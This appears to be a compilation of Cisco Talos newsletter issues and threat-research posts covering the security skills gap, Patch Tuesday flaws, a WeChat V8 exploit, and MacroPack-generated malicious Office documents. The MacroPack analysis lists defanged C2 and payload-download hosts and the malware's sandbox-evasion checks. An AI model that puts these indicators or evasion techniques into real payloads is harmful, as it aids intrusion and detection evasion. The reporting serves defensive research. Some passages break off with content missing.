I have written about the dreaded “cybersecurity skills gap” more times than I can remember in this newsletter, but I feel like it’s time to revisit this topic again.  

That’s because the White House announced a new initiative last week for the U.S. government called the “Service for America” initiative designed to train new workers in the cybersecurity field. This measure directs U.S. federal agencies to help recruit and prepare Americans for jobs in cybersecurity and AI by removing certain degree requirements and emphasizing skills-based hiring. This means, hopefully, more educational resources for people looking to break into cybersecurity. 

On its face, I’m all in favor of this. I did eventually go back to school to get my associate's degree in cybersecurity, but much of what I’ve learned about this field has been from working at Talos and spending time around my talented and intelligent colleagues, many of whom did not go to college for cybersecurity.  

The U.S. government also has separate initiatives to support neurodivergent candidates who want to work in security, as well as those who are blind and visually impaired. 

My concern is that, even if we do train these employees and give them the proper skills, it’s on companies to eventually hire them.  

A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America. Yet hiring in the industry has remained flat, according to a soon-to-be-released report from cybersecurity non-profit ISC2. This year, the global security workforce is estimated to be 5.5 million, which is only a 0.1 percent increase year over year, according to the report. 

Among the more than 15,000 cybersecurity practitioners from around the globe who responded to the study, 38 percent of respondents said their organizations had experienced a cybersecurity hiring freeze over the past year, up 8 percent from 2023. Thirty-seven percent of respondents reported budget cuts to the security program, and another 25 percent said their teams had experienced layoffs.  

That same CyberSeek report also found that, in the U.S., the amount of cybersecurity-related job postings decreased by 29 percent year-over-year. 

So as these skills gap-closing programs begin, we need to be thinking about what skills, exactly, managers want their workers to be trained in. There is obviously some sort of disconnect here between the people who want to work in security compared to the companies or managers who want to hire them. Or there just simply isn’t enough money to go around right now to handle staffing up cybersecurity teams, and that’s just the reality of the current economy in the U.S. and globally.  

I’m not saying this to discourage anyone from entering the security space or spread doom and gloom. But I do think it’s important to acknowledge that there are many already skilled and trained workers who simply cannot find work or are treading water throwing dozens of applications at the wall to see what sticks. 

I’ve seen too many people posting on LinkedIn recently looking for a cybersecurity job to think that the solution to bolstering security is getting \*another\* worker in with the same skillset to compete for the same job opening as someone who’s been in the industry for 10 years. 

**The one big thing **

Talos recently uncovered a new threat called “DragonRank” that primarily targets countries in Asia — and a few in Europe — operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation. DragonRank exploits targets’ web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities. Their PlugX not only used familiar sideloading techniques, but the Windows Structured Exception Handling (SEH) mechanism ensures that the legitimate file can load the PlugX without raising suspicion. 

**Why do I care? **

This group compromises Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users. DragonRank engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company's online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices. The actor then takes these compromised websites and promotes them, effectively turning these sites into platforms for scam operations. 

**So now what? **

Talos released a new Snort rule set and several ClamAV signatures to detect and block the malware used in these attacks. Talos has confirmed more than 35 IIS servers had been compromised and deployed the BadIIS malware across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, Netherlands and China in this campaign, so it’s clearly still active and potentially growing. 

**Top security headlines of the week **

**A new type of attack called “RAMBO” could allow adversaries to steal data over air-gapped networks with RAM radio signals.** An Israeli academic researcher recently announced the discovery of RAMBO (Radiation of Air-gapped Memory Bus for Offense), in which an attacker could generate electromagnetic radiation from a device’s RAM to send data from air-gapped computers. Air-gapped systems are otherwise offline networks that are extremely isolated, often used in critical environments like government agencies, weapons systems and nuclear power stations. While RAMBO does not pose a threat for any hacker with access to the internet, it could open the door for insider threats with access to the network to deploy malware through physical media like USB drives or supply chain attacks. RAMBO could allow attackers to seal encoded files, encryption keys, images, keystrokes and biometric information from these systems at a rate of 1,000 bits per second. Researchers conducted tests into these types of attacks over distances of up to 23 feet. A technical paper published on the topic includes several potential mitigations, including RAM jamming, external EM jamming and Faraday enclosures around potentially targeted systems. **Commercial spyware makers are still finding ways to bypass government sanctions and, in some cases, have made their tools harder to detect.** A new report from the Atlantic Council found that “Most available evidence suggests that spyware sales are a present reality and likely to continue.” The report specifically highlights increased activity from Intellexa and the NSO Group, two companies known for creating and selling spyware tools that have been targeted over the past few years by international sanctions. These companies, and specifically Intellexa, have found ways to work around sanctions by restructuring their businesses with subsidiaries, partners and other relationships spread across multiple geographic areas. Intellexa is known for creating the Predator spyware, while the NSO Group is infamous for the Pegasus spyware. Both pieces of software often target high-risk individuals, sometimes by governments, such as journalists, politicians and activists. Security researchers also recently found that Intellexa has established new infrastructure in the Democratic Republic of the Congo and Angola, making “it more difficult for researchers and cybersecurity defenders to track the spread of Predator.” (Dark Reading, The Register) 

**Several Western intelligence agencies have formally charged the Russian GRU for carrying out cyber attacks against Ukraine designed to disrupt aid efforts.** Government agencies in the U.S., U.K. and several other countries blamed Unit 29155, which has been linked to past espionage campaigns, with targeting government and civilian agencies and civil society organizations in Western Europe, the EU and NATO after Russia invaded Ukraine in 2022. Intelligence agencies in the Netherlands, Czech Republic, Germany, Estonia, Latvia, Canada and Australia all signed the declaration. They also formally blamed Unit 29155 for the WhisperGate campaign, a coordinated attack on Ukrainian government agencies in January 2022 that seemed to set the stage for a physical ground invasion. The announcement stated that WhisperGate has since been used to “scout and disrupt” aid deliveries to Ukraine. When Talos first reported on WhisperGate in 2022, our researchers stated that “attackers used stolen credentials in the campaign and they likely had access to the victim network for months before the attack, a typical characteristic of sophisticated advanced persistent threat (APT) operations.” (Reuters, BBC)

Cisco Talos’ Vulnerability Research team discovered two vulnerabilities have been disclosed and fixed over the past few weeks. 

Talos discovered a time-of-check time-of-use vulnerability in Adobe Acrobat Reader, one of the most popular PDF readers currently available, and an information disclosure vulnerability in the Microsoft Windows AllJoyn API.

**Microsoft AllJoyn API information disclosure vulnerability **

   
The AllJoyn API in some versions of the Microsoft Windows operating system contains an information disclosure vulnerability. 

TALOS-2024-1980 (CVE-2024-38257) could allow an adversary to view uninitialized memory on the targeted machine. 

AllJoyn is a DCOM-like framework for creating method calls or sending one-way signals between applications on a distributed bus. It primarily is used in internet-of-things (IoT) devices to tell the devices to perform certain tasks, like turning lights on or off or reading the temperature of a space. 

Microsoft fixed this issue as part of its monthly security update on Tuesday. For more on Patch Tuesday, read Talos’ blog here.

**Adobe Acrobat Reader annotation object page race condition  **

_Discovered by KPC._ 

Adobe Acrobat Reader, one of the most popular pieces of PDF reading software currently available, contains a time-of-check, use-after-free vulnerability that could trigger memory corruption, and eventually, arbitrary code execution. 

TALOS-2024-2011 (CVE-2024-39420) can be executed if an adversary tricks a targeted user into opening a specially crafted PDF file with malicious JavaScript embedded. This JavaScript could then trigger memory corruption due to a race condition.  

Depending on the memory layout of the process this vulnerability affects, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.

Microsoft disclosed four vulnerabilities that are actively being exploited in the wild as part of its regular Patch Tuesday security update this week in what’s become a regular occurrence for the company’s patches in 2024. 

Two of the zero-day vulnerabilities, CVE-2024-38226 and CVE-2024-38014, exist in the Microsoft Publisher software and Windows Installer, respectively. Last month, Microsoft disclosed six vulnerabilities in its Patch Tuesday that were already being exploited in the wild.  

In all, September’s monthly round of patches from Microsoft included 79 vulnerabilities, seven of which are considered critical. In addition to the zero-days disclosed Tuesday, Microsoft also fixed a security issue that had already been publicly disclosed: CVE-2024-38217, a vulnerability in Windows Mark of the Web that could allow an adversary to bypass usual MOTW detection techniques.  

Cisco Talos’ Vulnerability Research team also discovered an information disclosure vulnerability in the AllJoyn API that could allow an adversary to access uninitialized memory. CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges.  

The most serious of the issues included in September’s Patch Tuesday is CVE-2024-43491, which has a severity score of 9.8 out of 10. CVE-2024-43491, a remote code execution issue in Windows Update, is considered “more likely” to be exploited, though Microsoft disclosed few details about the nature of this vulnerability. 

There are also four remote code execution vulnerabilities in SharePoint Server that are also considered “more likely” to be exploited: CVE-2024-38018, CVE-2024-38227, CVE-2024-38228 and CVE-2024-43464. 

In the case of the latter three vulnerabilities, an authenticated attacker with Site Owner permissions can inject arbitrary code and execute code in the context of SharePoint Server. However, an attacker only needs to have Site Member permissions to exploit CVE-2024-38018. 

CVE-2024-38226, one of the zero-days disclosed this week, is a security feature bypass vulnerability in Microsoft Publisher that could allow an attacker to bypass the default Microsoft Office macro policies used to block untrusted or malicious files. An adversary could exploit this vulnerability by tricking a user into opening a specially crafted, malicious file in Microsoft Publisher, which could lead to a local attack on the victim’s machine. Macros have been blocked by default on Office software to prevent attackers from hiding malicious code in them.  

Another vulnerability being actively exploited in the wild, CVE-2024-38014, is an issue in Windows Installer that could allow an adversary to gain SYTEM-level privileges. This issue affects Windows 11, version 24H2, which is currently only available on certain Microsoft Copilot+ devices, among other older versions of Windows 10 and 11. 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63979 - 63984 and 63987 - 63994. There are also Snort 3 rules 301008 - 301013.

As we head into the final furlong of 2024, we caught up with Talos’ Head of Outreach Nick Biasini to ask him what sort of year it’s been so far in the threat landscape. 

In this video, Nick outlines his two major areas of concern. **2024 in threat research:**

**Jan. 18:** **Exploring malicious Windows drivers**

Drivers have long been of interest to threat actors, whether they are exploiting vulnerable drivers or creating malicious ones. Malicious drivers are difficult to detect and successfully leveraging one can give an attacker full access to a system. Part 1 of our Driver series served as a starting point for learning about malicious drivers while part 2, released in June, covered the I/O system, IRPs, stack locations, IOCTLs and more.

**Feb. 8:** **New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization**

Talos discovered a new, stealthy espionage campaign that likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.” 

**Feb. 15:** **TinyTurla Next Generation — Turla APT spies on Polish NGOs**

This backdoor we called “TinyTurla-NG” (TTNG) was similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.

**Feb. 20:** **Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns**

Since September 2023, we observed a significant increase in the volume of malicious emails leveraging the Google Cloud Run service to infect potential victims with banking trojans.

**Feb. 27:** **TimbreStealer campaign targets Mexican users with financial lures**

Talos observed a phishing spam campaign targeting victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023.

**March 5:** **GhostSec’s joint ransomware operation and evolution of their arsenal**

We observed a surge in GhostSec’s malicious activities this past year. GhostSec evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.

**April 9:** **Starry Addax targets human rights defenders in North Africa with new malware**

We disclosed a new threat actor we deemed “Starry Addax” targeting mostly human rights activists, associated with the Sahrawi Arab Democratic Republic (SADR) cause with a novel mobile malware.

**April 16:** **Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials**

Talos actively monitored a global increase in brute-force attacks against a variety of targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.  

**April 17:** **OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal**

During a threat-hunting exercise, Talos discovered documents with potentially confidential information originating from Ukraine. The documents contained malicious VBA code, indicating they may be used as lures to infect organizations. 

**April 23:** **Suspected CoralRaider continues to expand victimology using three information stealers**

Talos discovered a new PowerShell command-line argument embedded in the LNK file to bypass anti-virus products and download the final payload into the victims’ host.

**April 24:** **ArcaneDoor — New espionage-focused campaign found targeting perimeter network devices**

ArcaneDoor was a campaign that was the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns.

**May 22:** **From trust to trickery: Brand impersonation over the email attack vector**

Cisco developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation.

**May 31:** **New banking trojan “CarnavalHeist” targets Brazil with overlay attacks**

Since February 2024, Cisco Talos observed an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) were common among other banking trojans coming out of Brazil.

**June 5:** **DarkGate switches up its tactics with new payload, email templates**

DarkGate was observed distributing malware through Microsoft Teams and even via malvertising campaigns.

**Aug. 1:** **APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike**

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups.

**Aug. 28:** **BlackByte blends tried-and-true tradecraft with newly disclosed vulnerabilities to support ongoing attacks**

In recent investigations, Talos Incident Response observed the BlackByte ransomware group using techniques that depart from their established tradecraft.

While this issue was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported it to the vendor.

*   Certain versions of WeChat, a popular messaging app created by tech giant Tencent, contain a type confusion vulnerability that could allow an adversary to execute remote code. 
*   While this issue, CVE-2023-3420, was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported to the vendor in April 2024.  
*   Cisco Talos researchers have confirmed that WeChat versions up to 8.0.42 (the latest version on the Google Play store for Android devices before June 14, 2024) were vulnerable to this issue. However, due to the dynamic WebView loading mechanism, Talos cannot confirm if it’s patched on all versions. 
*   Talos reported the vulnerability to Tencent WeChat on April 30, 2024, and continued our investigation in the following weeks and months. 

**Vulnerability overview **

WeChat is an instant messenger application with a large user base in China. It also offers users the ability to pay for certain products through the app and includes several functionalities similar to other social media platforms like Facebook and X. 

During Cisco Talos’ research of WeChat, we uncovered that it employs a custom WebView component instead of relying on the built-in Android WebView. This component is a custom version of XWalk, maintained by Tencent, which consists of an embedded Chromium browser with V8 version 8.6.365.13 released on Oct. 12, 2020, supporting the rendering of HTML and the execution of JavaScript. 

The custom WebView component is dynamically downloaded onto the phone after the user logs into the app for the first time, allowing Tencent to deploy dynamic updates. When downloaded, XWalk webview is located at the path \`/data/data/com.tencent.mm/app\_xwalk\_4433/apk/base.apk\`. The library at /data/data/com.tencent.mm/app_xwalk_4433/extracted_xwalkcore/libxwebcore.so contains an embedded browser environment with an outdated version of V8.  

GitHub Security Labs published detailed analysis of this vulnerability, CVE-2023-3420, for V8 version 11.4.183.19 in June 2023.      

**How can the exploit be triggered? **

The exploit, which we have seen in the wild,  is triggered when the victim clicks a URL in a malicious WeChat message. Clicking a URL in WeChat causes the webpage with embedded JavaScript to be loaded inside XWalk, which triggers exploitation. A so called one-click exploit. 

**What is the impact of this vulnerability? **

The exploit allows the threat actor to gain control of the victim's device and execute arbitrary code.

**How do I know if I’m impacted? **

Talos has confirmed the WeChat version 8.0.42 (the latest version available on the Play Store before June 14) is impacted. For WeChat using the impacted custom browser (MMWEBID/2247), the user agent of request includes the version information of the custom browser. For example:

**What do I do if I’m impacted? **

Update to the latest version of WeChat and confirm XWalk is updated as well (in our testing, the app does not get updated to the latest version automatically right after the update is released). Alternatively, do not click on any links sent over WeChat if using the impacted versions. If you must read links, copy the link from the WeChat chat and open them on an updated web browser outside the application. We recommend WeChat users be aware of the URL links sent in WeChat. Before clicking the URL links, verify it’s from a trusted source.

As most quality thoughts go, my most recent musing on security came about because of fantasy football. 

I had to log into my Yahoo Sports account, which I admittedly only ever have to log in to, at most, three times a year for the one fantasy football draft I have on that platform each year and then the handful of other times my phone logs me out during the five months that I’m adjusting my lineups on a weekly basis.  

Admittedly, I’d never thought much about the security of my Yahoo Sports account because I don’t have any sensitive information tied to it, and if someone did want to break in, they could probably do a better job of managing my team in that league than I have the past few years. It’s the old “out of sight, out of mind” compared to something like my work email account where I’m logging in every morning, or online banking which I’m using several times a week, and the knowledge that my financial wellbeing is tied to those account credentials. 

But I have to give credit to Yahoo for how they handled my account being less secure. When I logged in, probably for the first time since January, this weekend, before it would even display my homepage or enter the fantasy draft, it took me to an account management page where it warned me that I was using a “less secure” password and still hadn’t enrolled in multi-factor authentication. It took me less than a minute to update my password to something more secure, and maybe another two minutes to enroll in passcode MFA. 

The account management page also had some helpful information, such as how long it had been since my last password change, offering the ability to manage my password through a third-party app, and multiple options to set up MFA, including using the Yahoo Sports app directly (this is always more appealing to me than having to download yet another MFA app on my phone). 

This also got me thinking about the ways in which I don’t like being asked or reminded to enroll in MFA. It never made any sense to me that sites would give users the option to click away from the screen when being asked to enroll in MFA — make it mandatory or don’t. Also, one of my biggest pet peeves in using the internet is when you confirm this is a personal device or “Remember Me” for the next time I log in and the site doesn’t, in fact, remember me, and I have to go through the same approval process multiple times in the same day. 

Our friends at Cisco Duo also have a few other great recommendations for getting people to enroll in MFA, but in my opinion, mandatory enrollment is best enrollment. If I had never displayed that screen on Yahoo’s login page, I wouldn’t have even thought twice about how secure my account was. And seeing a red “!” next to my password gave off an immediate sign that my password needed to be improved, which is something I wish other sites would start doing.  

It’s not like having my fantasy football login credentials compromised would be the end of the world, but when it comes to something more high stakes, there are a few small UI steps sites could take to help nudge us in the right direction. 

**The one big thing **

Threat actors are increasingly using a traditional Red Teaming tool called MacroPack to create new malware payloads. These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT). Several different actors are using this tactic based on files uploaded to VirusTotal that Talos analyzed. They are written in different languages and rely on different themes centered on different geographies, which leads us to believe these are disparate campaigns.  

**Why do I care? **

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures. 

**So now what? **

Talos released a new Snort rule set and several ClamAV signatures to detect and block the malicious files Talos analyzed as part of this research. Our blog post also has an in-depth breakdown of the four major themes used across these malicious documents, information that could be crucial to informing potential targets about these threats.  

**Top security headlines of the week **

**A new report from Google’s Threat Analysis Group found that Russia’s APT29 is exploiting some of the same vulnerabilities as two popular spyware vendors.** The analysis comes from watering hole attacks that researchers saw in the wild between November 2023 and July 2024 targeting Mongolian government websites. APT29, largely thought to be connected to Russia’s government, exploited the same vulnerabilities in Apple iOS WebKit and Google Chrome that two spyware vendors, Intellexa and NSO Group, are also known to use. The actor (also known as Cozy Bear and Midnight Blizzard) compromised the government-controlled websites to embed malicious payloads in hidden iframes on web pages. These iframes pointed users to attacker-controlled websites, where the exploits were deployed to steal user data from iOS and Android devices. Intellexa, which Cisco Talos has reported on several times, was recently blacklisted by the U.S. government for its role in creating and distributing the Predator spyware. And the Israeli NSO Group is infamous for its Pegasus spyware, commonly used to target at-risk individuals like journalists, politicians and activists. (Google TAG, The Record) 

**A North Korean state-sponsored actor known as Citrine Sleet is actively exploiting a zero-day vulnerability in the Google Chrome web browser to steal users’ cryptocurrency.** Microsoft wrote in an advisory regarding the vulnerability, identified as CVE-2024-7971, that users had been "targeted and compromised" by the zero-day attack. Google has since released a patch for the issue. CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow an attacker to execute remote code on the targeted machine. Citrine Sleet is believed to be based in North Korea and primarily targets financial institutions, especially those that manage cryptocurrency accounts. Its social engineering techniques focus on the cryptocurrency industry and individuals believed to be associated with it. Exploitation of the vulnerability started by tricking a victim into visiting an attacker-controlled website. Then, because of a different vulnerability in the Windows kernel, Citrine Sleet could install a rootkit on the target’s computer, essentially giving them complete control of the machine. Cryptocurrency has long been a target for North Korean state-sponsored actors, who often use the stolen currency to fund the country’s military operations. (TechCrunch, Decipher) 

**The FBI released a new warning this week that North Korean actors could soon launch a wave of cyber attacks targeting "organizations with access to large quantities of cryptocurrency-related assets or products.”** A public service announcement released Tuesday said that actors had been carrying out reconnaissance-related social engineering campaigns for months targeting individuals believed to be involved in the cryptocurrency industry, or employees of financial institutions who handle virtual currency. Most of the potential targets are found by the actors by monitoring their social media activity, particularly on professional networking or employment-related platforms. These actors also are impersonating legitimate employees, looking to gain remote employment at these companies using fake names, identities and profiles. “Given the scale and persistence of this malicious activity, even those well versed in cybersecurity practices can be vulnerable to North Korea's determination to compromise networks connected to cryptocurrency assets,” the PSA reads. You may have already read about the incredible story of Project PowerUp – how we worked with a multi-company, multi-national team to find a way to keep the lights on in Ukraine in the face of electronic warfare. 

Today, we are releasing a short documentary on how this story came to be, while exploring the impact on the daily lives of millions of Ukrainians. The documentary delves into the history of targeted attacks against Ukrainian critical infrastructure, from the Black Energy attack in 2015 and the Industroyer campaign the following year. We then study a unique challenge involving GPS jamming, which came up within a chance conversation over dinner with some of our Ukrainian partners. 

We hope this story shines a light on some of the issues faced within an electronic warfare zone, and how sometimes thinking outside of the box isn’t enough. Sometimes, you need to first create the box.

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.

*   Cisco Talos recently discovered several related Microsoft Office documents uploaded to VirusTotal by various actors between May and July 2024 that were all generated by a version of a payload generator framework called “MacroPack.”
*   MacroPack is a framework designated for Red Team exercises, but we assess, with moderate confidence, that malicious actors are also using it to deploy malicious payloads.
*   Talos analyzed the most recent documents uploaded to VirusTotal from different sources and countries, including China, Pakistan, Russia and the U.S., uncovering connections between the payloads and motivations for creating these documents.
*   These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT).
*   Talos was not able to attribute these activities to a single actor despite some similarities in tactics, techniques and procedures (TTPs). No Talos customers were affected by these attacks and there are no related activities  in any Cisco product telemetry.

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. 

As a part of regular hunting exercises for malicious documents similar to the ones used by UNC1151, we discovered several suspicious documents using VBA macros that were similar but could not be attributed to the same threat actor.

Although the VBA code was similar — using obfuscated variable and function names and one or more layers of obfuscated code in their following stages — the lure themes were different, ranging from generic topics that instruct users to enable VBA macros, to official-looking documents and letters that appear to come from military organizations, pointing to various distinct threat actors. 

**Common characteristics of MacroPack VBA code**

The VBA code in all the documents had similar characteristics, which we traced to the MacroPack framework. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. 

The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures:

*   Function renaming.
*   Variable renaming.
*   Removal of surplus space characters.
*   Removal of comments.
*   Strings encoding.
*   Payload obfuscation.

MacroPack is designed to be easy to use and quickly generate various payloads allowing users to build working implants with a single command line. 

MacroPack also exists in a professional, supported version, which contains additional functionality to make payloads more resilient and has some more advanced features such as anti-malware bypass, more advanced payloads, anti-reversing and additional payloads. The author states that the tool is intended to be used by Red Team members and not for malicious purposes, although there is no control over who uses the free version of the tool. 

**Inclusion of non-malicious code**

A common feature in all the malicious documents we dissected that caught our attention is the existence of four non-malicious VBA subroutines. These subroutines appeared in all the samples and were not obfuscated. They also had never been used by any other malicious subroutines or anywhere else in any documents. 

At the beginning of the investigation, we suspected all the documents containing these unusual non-malicious subroutines were created by a single threat actor. But the different document lures and countries from where the documents were uploaded lead us to conclude that those subroutines were included by the professional version of MacroPack, which we confirmed via reliable, high-fidelity sources.

We traced the origin of the two functions to a website hosting various VBA examples and one to a French Microsoft Word programming book “Rédigez Facilement Des Documents Avec Word” (“Easily Writing Documents with Word”) by Michel Martin.

The inclusion of the benign code is likely to lower the level of suspicion of the code generated by MacroPack. Some anti-malware engines may be able to detect code as suspicious if the entropy of the code is high to indicate pseudo-randomly named variables, functions and obfuscated strings and the inclusion of non-malicious functions with low entropy may be used to lower the overall entropy of the generated code. 

Some documents containing the non-malicious code, attributed to MacroPack, also used a different technique for generating code. Instead of completely pseudo-randomly generated variable and function names, they consisted of combinations of randomly chosen real words. 

The MacroPack author indicated that he worked on a feature to generate names using Markov chains to create seemingly meaningful function and variable names.

This functionality was included by the MacroPack author to improve the bypassing of anti-malware heuristic detections. We discovered a few samples using this technique to obfuscate the functionality of the code with meaningful-looking function and variable names.

**MacroPack documents uploaded to VirusTotal**

Although the TTPs in the discovered samples seem malicious and the lure themes indicate that they are, we were unable to trace the actors to a particular group, which also leaves a possibility that they were part of red teaming exercises. However, it is still important to document the samples as blue teams may also encounter them in their own detection tests. 

For some discovered samples, we confirmed they were part of some Red Team activities and they are not included in the list of IOCs. A description of a few interesting clusters of documents follows. 

All the documents have a similar flow, being generated by the framework and consist of at least three stages of code before connecting to the C2 server, to allow infected systems to be controlled by the threat actors.

**Theme 1: Lures uploaded from China**

The first cluster of three documents were uploaded to VirusTotal from IP addresses residing in China, Taiwan and Pakistan in May and July 2024, and feature three similar lures with a generic Word document content that instructs the users to “enable content,” which would allow a VBA macro code to execute. The beginning of the document contains this text either in Chinese or English.

All C2 IP addresses for the payloads of the generic template campaign reside in the address space of the same autonomous system, AS4837, located in the Henan province in China, which, together with the usage of similar lure themes and MacroPack, enable us to cluster them as originating from a single actor.

**Theme 1 payloads**

Two of the three documents, the ones with lures in Chinese, have the Havoc demon (implant) as the final payload. Havoc is a post-exploitation command and control (C2) framework made for penetration testers, Red Teams and Blue Teams. It's free and open-source on GitHub, written and maintained by Paul Ungur. The Havoc Framework is split into two components — the teamserver and the agent. The Teamserver handles connected operators, tasking agents and parsing the callbacks, results of commands, uploaded files and screenshots. The agents or implants are called demons, in Havoc terminology, and are installed by the operator to the systems that should be controlled.The agents allow the operators to remotely control affected systems. 

The difference between the two variants are that they have different IP addresses for C2, and one lure is compiled for 64-bit Windows, while the other is for 32-bit Windows. Both lures are likely related, as they share similar lure themes, have the same AS for C2 addresses and have C2 URLs that appear as if cloud email communication is attempted, together with appropriate referrers set up in HTTP headers.

After the shellcode loads the Havoc demon, the DLL reads its configuration hosts from a plain text structure.

The second payload is a Brute Ratel implant (badger) loaded from a shellcode loader as a DLL.  Brute Ratel is a C2 framework primarily used for Red Teaming and adversary simulation, although it was also abused by real threat actors. 

Brute Ratel is a very popular framework similar to Cobalt Strike and enables its users to:

*   Deploy agents (called badgers) onto target systems.
*   Execute commands remotely.
*   Perform lateral movement within a network.
*   Establish persistence.
*   Evade detection by endpoint security solutions.

The configuration for the badger is stored in the shellcode body (approximately 250KB long) and the DLL decrypts it using RC4 decryption with the decryption key hardcoded in the badger executable.

**Theme 2: Pakistani military lures**

The second cluster of documents, with Pakistani military-related themes, were uploaded to VirusTotal from two different locations in Pakistan. We have elected to classify them together based on the military-related themes and a Brute Ratel DLL badger as the final payload.

The first document contains an embedded image of a document masquerading as a circular claiming to announce new awards for certain officer ranks in the Pakistan Air Force, with land plots as a reward for their services. When the document is opened and VBA code allowed to run, the MacroPack-generated code will create a Brute Ratel shellcode loader in memory and execute it to load a badger DLL. The configuration for all DLL implants is contained in the shellcode and is used by the badger after decryption using RC4-based decryption. 

The implant in the first document is configured to use DNS over HTTPs with dns\[.\]google and cloudflare-dns\[.\]com servers to tunnel the data over DNS for hosts dns1\[.\]s-logistics\[.\]net and dns2\[.\]s-logistics\[.\]net.

The second lure purports to be a confidential document sent to a specific recipient containing an employment confirmation letter for a civilian member of Pakistan’s Air Force Cyber Team. The payload for this document is also a DLL-based Brute Ratel badger, but this time using several Amazon Cloudfront CDN servers for the C2 rotation.

One interesting characteristic of the second document’s Brute Ratel payload is the inclusion of a base64-encoded blob containing a JSON object created to be used with the Adobe Experience Cloud ecosystem for tracking marketing activities. One possible reason for this is that the document was part of a Red Team exercise and Adobe Experience Cloud was used to track the target’s engagement.

**Theme 3: Lure uploaded from Russia**

A few things stood out when we observed a file created with MacroPack uploaded to VirusTotal from a Russian IP address at the beginning of July 2024. While most of the other files we analyzed were Word documents, this one is an Excel workbook. The lure also is completely void of content, and when the workbook is opened, there is nothing to see. 

The VBA code was also a bit different from the ones discovered earlier. Instead of creating a byte array containing shellcode and loading it into the host process, this one had more VBA code for the next stage, and the way it was executed was also quite unusual.

_._The first-stage code generates the second VBA layer, launches a new instance of Excel and creates a new workbook that is the target for the injection of the second stage, similar to VBA virus infection. 

When the second stage is executed, it attempts to download, load and execute a file from the URL hxxp\[://\]td\[.\]tula-steel\[.\]ru/en/image\[.\]jpg. We have no indication that this TTP was successful. 

**Theme 3 payload**

At the time of writing this post, the target URL contained a sample of a Golang-based backdoor PhantomCore, which is attributed by researchers from Kaspersky to the Ukrainian hacktivist Head Mare, allegedly targeting government organizations and companies in Russia with the goal of cyber espionage.

Some PhantomCore variants are obfuscated with the Golang obfuscator, garble, which makes them more challenging for the analyst, but the core functionality is similar — to connect to a C2 server using the rsocket protocol and listen for commands that allows it to install additional modules, upload data or execute a command. 

**Theme 4: Uploaded from the U.S.**

 This final theme was uploaded to VirusTotal much earlier than the previous examples (March 2023) and it purports to be an encrypted NMLS (U.S. Nationwide Multistate Licensing System & Registry) renewal form. We chose this document lure to demonstrate MacroPack’s usage of a Markov Chain-based name generator. This document, similar to the lure uploaded from Russia, has multiple VBA stages. 

The first stage decodes the second and launches another Word instance to run it. Before launching the final payload, the second stage checks for the presence of the analysis environment, such as sandboxes and test systems. 

The second stage code will exit any the following conditions are satisfied:

*   Number of logical CPUs in the system is 1.
*   The User name is “USER”.
*   One of the following processes are active: fiddler, vxstream, vboxservice, tcpview, vmware, procexp, wmtools, processexplorer, processhacker, vbox, autoit, wireshark, procmon, idaq, autoruns, apatedns or windbg.
